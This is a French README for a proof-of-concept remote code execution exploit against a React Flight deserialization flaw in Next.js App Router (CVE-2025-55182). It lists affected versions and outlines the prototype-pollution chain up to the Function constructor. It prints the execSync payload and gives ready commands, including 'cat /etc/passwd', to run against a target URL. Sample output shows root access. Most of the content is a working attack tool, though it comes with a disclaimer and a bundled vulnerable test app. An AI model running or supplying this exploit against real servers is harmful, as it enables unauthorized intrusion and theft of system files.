
Proof-of-Concept RCE pour CVE‑2025‑55182 exploitant le protocole React Flight sur Next.js App Router.
| Next.js | React |
|---|
| 14.3.0-canary.77 à 15.0.4 | 19.0.0 |
| 15.1.1-canary.0 à 15.1.8 | 19.1.0 |
| 15.2.0-canary.0 à 15.2.5 | 19.1.1 |
| 15.3.0-canary.0 à 15.3.5 | 19.2.0 |
| 15.4.0-canary.0 à 15.4.7 | |
| 15.5.1-canary.0 à 15.5.6 | |
| 16.0.0-canary.0 à 16.0.6 |
| Next.js |
|---|
| 15.0.5, 15.1.9, 15.2.6, 15.3.6, 15.4.8, 15.5.7, 16.0.7+ |
$@ pour obtenir une référence brute Chunk.then avec Chunk.prototype.then via $1:__proto__:thenstatus sur resolved_model pour déclencher initializeModelChunk$B1337 pour déclencher la désérialisation Blob_formData.get vers le constructeur Function_prefix contient le code JS à exécuterLe code est évalué via :
Function("throw new Error(require('child_process').execSync('COMMAND').toString());//1337")
pip install -r requirements.txt
python cve_2025_55182_poc.py https://target.com --check-only
# Default command (id)
python cve_2025_55182_poc.py https://target.com
# Custom command
python cve_2025_55182_poc.py https://target.com -c "whoami"
python cve_2025_55182_poc.py https://target.com -c "cat /etc/passwd"
python cve_2025_55182_poc.py https://target.com -c "dir C:\\"
| Option | Description |
|---|---|
url | URL cible (obligatoire) |
-c, --command | Commande à exécuter (par défaut : id) |
--check-only | Vérifier uniquement la vulnérabilité |
-t, --timeout | Délai d'attente en secondes (par défaut : 15) |
-v, --verbose | Sortie détaillée |
--raw | Afficher la réponse brute |
cd vulnerable-app
npm install
npm run dev
# Server at http://localhost:3000
+======================================================================+
| CVE-2025-55182 - React Server Components RCE |
| React Flight Protocol Deserialization Vulnerability |
+======================================================================+
[*] Affected: React 19.0.0-19.2.0 / Next.js 14.3-16.0.6
[*] CVSS Score: 10.0 (CRITICAL)
[*] Author: rl0x01
[*] Target: http://localhost:3000
[*] Timeout: 15s
[1/2] Checking vulnerability...
[+] VULNERABLE! RCE Confirmed - Output received
[2/2] Executing command: whoami
[+] Payload sent!
============================================================
RESULT: whoami
============================================================
root
============================================================
CVE-2025-55182/
├── cve_2025_55182_poc.py # Main exploit script
├── requirements.txt # Python dependencies
├── README.md # Documentation
└── vulnerable-app/ # Vulnerable Next.js app for testing
├── package.json
├── next.config.js
└── app/
├── layout.js
├── page.js
└── actions.js
⚠️ Cet outil est fourni uniquement à des fins éducatives et de tests de sécurité autorisés.
L'utilisation non autorisée de cet outil contre des systèmes que vous ne possédez pas ou pour lesquels vous ne disposez pas d'une autorisation explicite de test est illégale.